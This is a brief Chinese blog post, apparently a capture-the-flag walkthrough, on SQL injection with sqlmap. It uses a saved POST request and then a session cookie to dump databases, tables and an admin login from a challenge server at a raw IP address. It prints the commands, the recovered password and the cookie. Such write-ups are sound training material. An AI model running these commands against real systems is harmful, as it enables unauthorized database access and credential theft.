sqlmap的post注入加cookie
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sqlmap的post注入加cookie相关的知识,希望对你有一定的参考价值。
1,首先看下这个网站
2,用抓包工具进行抓包
3,保存到txt文本文档为1.txt;
4,sqlmap开始注入;
python2 sqlmap.py -r "C:\Users\95112\Desktop\1.txt" -p username --dbs
获取表
python2 sqlmap.py -r "C:\Users\95112\Desktop\1.txt" -p username -D " sqli_database" --tables
python2 sqlmap.py -r "C:\Users\95112\Desktop\1.txt" -p username -D " sqli_database" -T "user" --columns
最终得到账号是admin密码u4g009
登录成功,得到url
http://118.190.152.202:8011/?id=1
截取cookie
phpSESSID=gvfqspfsid48p2lf8e6iv0s9d0
继续sql注入
python2 sqlmap.py -u "http://118.190.152.202:8011/?id=1" --cookie="PHPSESSID=gvfqspfsid48p2lf8e6iv0s9d0" --dbs
最终得到flag
以上是关于sqlmap的post注入加cookie的主要内容,如果未能解决你的问题,请参考以下文章